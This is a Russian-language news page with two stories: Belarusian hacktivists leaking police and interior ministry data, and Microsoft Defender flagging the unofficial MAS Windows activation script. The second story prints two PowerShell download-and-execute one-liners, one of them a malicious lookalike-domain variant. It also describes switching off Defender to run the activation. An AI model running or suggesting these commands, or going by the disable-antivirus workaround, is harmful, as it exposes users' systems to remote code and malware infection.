Белорусские киберпартизаны слили записи с камер следственных изоляторов

Белорусские киберпартизаны слили записи с камер следственных изоляторов

Белорусские киберпартизаны слили записи с камер следственных изоляторов

Белорусские хакеры, настроенные оппозиционно, сообщили о компрометации десятков баз данных, принадлежащих правоохранителям и Министерству внутренних дел Белоруссии. Теперь киберпреступники решили опубликовать украденную информацию, чтобы пошатнуть режим Лукашенко.

Это те самые «киберпартизаны», как они себя называют сами. За последние недели они выпустили немалые объёмы скомпрометированных данных, последние из которых были напрямую связаны с местной полицией и властями.

В слитых БД можно найти персональную информацию ключевых правительственных лиц, съёмки с дронов, записи конфиденциальных телефонных разговоров и многое другое. Об этом поведали сами хакеры в интервью Bloomberg News.

 

Среди украденных документов есть и персональные данные людей, входящих в узкий круг главы страны Александра Лукашенко, а также сведения о сотрудниках спецслужб. Например, киберпартизаны утверждают, что в Белоруссии умерло гораздо больше граждан, чем утверждают власти.

В интервью хакеры признались, что им удалось взломать более 240 камер наблюдения, установленных в белорусских городах. Более того, киберпреступники планируют вывести из строя правительственные компьютеры с помощью вредоносной программы под названием X-App.

Напомним, что в сентябре 2020 года киберпартизаны опубликовали интерактивную карту предателей народа.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru